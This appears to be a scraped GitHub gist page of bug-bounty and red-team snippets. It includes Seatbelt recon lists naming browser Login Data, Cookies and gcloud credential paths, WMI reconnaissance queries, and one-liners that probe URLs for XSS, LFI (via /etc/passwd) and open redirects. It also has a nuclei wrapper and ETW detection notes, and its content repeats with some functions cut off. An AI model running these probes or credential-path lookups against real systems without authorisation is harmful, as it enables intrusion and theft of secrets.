sasqwatch

## seatbelt_registry_basic_exploration.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe", ""
SOFTWARE\\Microsoft\\Internet Explorer\\TypedURLs"
SOFTWARE\\Microsoft\\Internet Explorer\\TypedURLsTime"
Software\\Policies\\Microsoft Services\\AdmPwd", "AdmPwdEnabled"
Software\\Policies\\Microsoft Services\\AdmPwd", "AdminAccountName"
Software\\Policies\\Microsoft Services\\AdmPwd", "PasswordComplexity"
Software\\Policies\\Microsoft Services\\AdmPwd", "PasswordLength"
Software\\Policies\\Microsoft Services\\AdmPwd", "PwdExpirationProtectionEnabled"
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU", "UseWUServer"
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate", "WUServer"

## seatbelt_appdata_basic_exploration.txt
\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks"
\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\"
\AppData\\Local\\Google\\Chrome\\User Data\\Default\\"
\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
\AppData\\Local\\Google\\Chrome\\User Data\\Default\\"
\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\"
\AppData\\Roaming\\gcloud\\credentials.db"

## seatbelt_wmi_query_strings_basic_exploration.txt
SELECT System.ItemPathDisplay,System.FileOwner,System.Size,System.DateCreated,System.DateAccessed,System.Search.Autosummary FROM SystemIndex WHERE Contains(*, '""*{0}*""') AND SCOPE = '{1}' AND (System.FileExtension = '.txt' OR System.FileExtension = '.doc' OR System.FileExtension = '.docx' OR System.FileExtension = '.ppt' OR System.FileExtension = '.pptx' OR System.FileExtension = '.xls' OR System.FileExtension = '.xlsx' OR System.FileExtension = '.ps1' OR System.FileExtension = '.vbs' OR System.FileExtension = '.config' OR System.FileExtension = '.ini')"
SELECT * FROM win32_networkconnection"
Select * from Win32_ComputerSystem"
SELECT * FROM Win32_DeviceGuard"
SELECT * FROM win32_service"
SELECT * FROM AntiVirusProduct"
SELECT * FROM MSFT_DNSClientCache"
SELECT ProcessId, ExecutablePath, CommandLine FROM Win32_Process"
SELECT * FROM Win32_Process"
SELECT * FROM Win32_Process WHERE SessionID != 0"

## is_cloudflare.py
#!/bin/env python
# Credits goes to @sw33tLie

from ipaddress import ip_network, ip_address

cidrs = ["173.245.48.0/20","103.21.244.0/22","103.22.200.0/22","103.31.4.0/22","141.101.64.0/18","108.162.192.0/18","190.93.240.0/20","188.114.96.0/20","197.234.240.0/22","198.41.128.0/17","162.158.0.0/15","104.16.0.0/12","172.64.0.0/13","131.0.72.0/22"]

def is_cloudflare(ip):
    for cidr in cidrs:
        net = ip_network(cidr)

## find js file one liner
assetfinder site.com | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done

## nuclear.sh
nucleir() {
	local TPL="$HOME/Documents/nuclei-templates"

	[[ -z "${1}" ]] && { echo "-target/-l ?"; return; }
	[[ -z "${2}" ]] && { echo "Input target?"; return; }

	for i in `ls -1d ${TPL}/*/`; do
		if [[ ! "${i}" =~ (brute-force|examples|payloads) ]]; then
			nuclei $1 $2 -t ${i} -o "$(basename $2)_nuclei-$(basename $i).txt"
		fi

## nuclear.sh
nucleir() {
	local TPL="$HOME/Documents/nuclei-templates"

	[[ -z "${1}" ]] && { echo "-target/-l ?"; return; }
	[[ -z "${2}" ]] && { echo "Input target?"; return; }

	for i in `ls -1d ${TPL}/*/`; do
		if [[ ! "${i}" =~ (brute-force|examples|payloads) ]]; then
			nuclei $1 $2 -t ${i} -o "$(basename $2)_nuclei-$(basename $i).txt"
		fi

## bash_aliases.sh
lfi() {
	gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
}

open-redirect() {
	local LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
}

## COMPlus_ETWEnabled_detection_notes.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                sasqwatch
                / COMPlus_ETWEnabled_detection_notes.md
            
            
              Created Aug 18, 2020
                — forked from Cyb3rWard0g/COMPlus_ETWEnabled_detection_notes.md
            
          
      View COMPlus_ETWEnabled_detection_notes.md
  
    
    Initial Notes:

The .NET Runtime Event Provider requires setting COMPLUS_ETWEnabled=1 in your process' environment.
CLRConfig will look for configurations in the following places in the following order:

Look at environment variables (prepending COMPlus_ to the name)
Look at the framework registry keys (HKCU\Software\Microsoft\.NETFramework
Look at the framework registry keys  HKLM\Software\Microsoft\.NETFramework)


These can be set in the following ways:

Setting the environment variable COMPlus_:

Windows


## oopen.sh
firefox `cat urls.txt | awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}'
firefox `cat urls.txt | awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}' | tr "\n" " "`

chromium-browser `cat urls.txt | awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}'
chromium-browser `cat urls.txt | awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}' | tr "\n" " "`

function oopen() {
  firefox `cat $1 | awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}'
}
	SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe", ""
	SOFTWARE\\Microsoft\\Internet Explorer\\TypedURLs"
	SOFTWARE\\Microsoft\\Internet Explorer\\TypedURLsTime"
	Software\\Policies\\Microsoft Services\\AdmPwd", "AdmPwdEnabled"
	Software\\Policies\\Microsoft Services\\AdmPwd", "AdminAccountName"
	Software\\Policies\\Microsoft Services\\AdmPwd", "PasswordComplexity"
	Software\\Policies\\Microsoft Services\\AdmPwd", "PasswordLength"
	Software\\Policies\\Microsoft Services\\AdmPwd", "PwdExpirationProtectionEnabled"
	SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU", "UseWUServer"
	SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate", "WUServer"
	\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks"
	\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\"
	\AppData\\Local\\Google\\Chrome\\User Data\\Default\\"
	\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
	\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
	\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
	\AppData\\Local\\Google\\Chrome\\User Data\\Default\\"
	\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
	\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\"
	\AppData\\Roaming\\gcloud\\credentials.db"
	SELECT System.ItemPathDisplay,System.FileOwner,System.Size,System.DateCreated,System.DateAccessed,System.Search.Autosummary FROM SystemIndex WHERE Contains(, '""{0}*""') AND SCOPE = '{1}' AND (System.FileExtension = '.txt' OR System.FileExtension = '.doc' OR System.FileExtension = '.docx' OR System.FileExtension = '.ppt' OR System.FileExtension = '.pptx' OR System.FileExtension = '.xls' OR System.FileExtension = '.xlsx' OR System.FileExtension = '.ps1' OR System.FileExtension = '.vbs' OR System.FileExtension = '.config' OR System.FileExtension = '.ini')"
	SELECT * FROM win32_networkconnection"
	Select * from Win32_ComputerSystem"
	SELECT * FROM Win32_DeviceGuard"
	SELECT * FROM win32_service"
	SELECT * FROM AntiVirusProduct"
	SELECT * FROM MSFT_DNSClientCache"
	SELECT ProcessId, ExecutablePath, CommandLine FROM Win32_Process"
	SELECT * FROM Win32_Process"
	SELECT * FROM Win32_Process WHERE SessionID != 0"
	#!/bin/env python
	# Credits goes to @sw33tLie

	from ipaddress import ip_network, ip_address

	cidrs = ["173.245.48.0/20","103.21.244.0/22","103.22.200.0/22","103.31.4.0/22","141.101.64.0/18","108.162.192.0/18","190.93.240.0/20","188.114.96.0/20","197.234.240.0/22","198.41.128.0/17","162.158.0.0/15","104.16.0.0/12","172.64.0.0/13","131.0.72.0/22"]

	def is_cloudflare(ip):
	for cidr in cidrs:
	net = ip_network(cidr)
	nucleir() {
	local TPL="$HOME/Documents/nuclei-templates"

	[[ -z "${1}" ]] && { echo "-target/-l ?"; return; }
	[[ -z "${2}" ]] && { echo "Input target?"; return; }

	for i in `ls -1d ${TPL}/*/`; do
	if [[ ! "${i}" =~ (brute-force\|examples\|payloads) ]]; then
	nuclei $1 $2 -t ${i} -o "$(basename $2)_nuclei-$(basename $i).txt"
	fi
	lfi() {
	gau $1 \| gf lfi \| qsreplace "/etc/passwd" \| xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 \| grep -q "root:x" && echo "VULN! %"'
	}

	open-redirect() {
	local LHOST="http://localhost"; gau $1 \| gf redirect \| qsreplace "$LHOST" \| xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 \| grep -q "Location: $LHOST" && echo "VULN! %"'
	}
	firefox `cat urls.txt \| awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}'
	firefox `cat urls.txt \| awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}' \| tr "\n" " "`

	chromium-browser `cat urls.txt \| awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}'
	chromium-browser `cat urls.txt \| awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}' \| tr "\n" " "`

	function oopen() {
	firefox `cat $1 \| awk '{if(index($1,"http")){print $1}else{print "http://"$1;print "https://"$1}}'
	}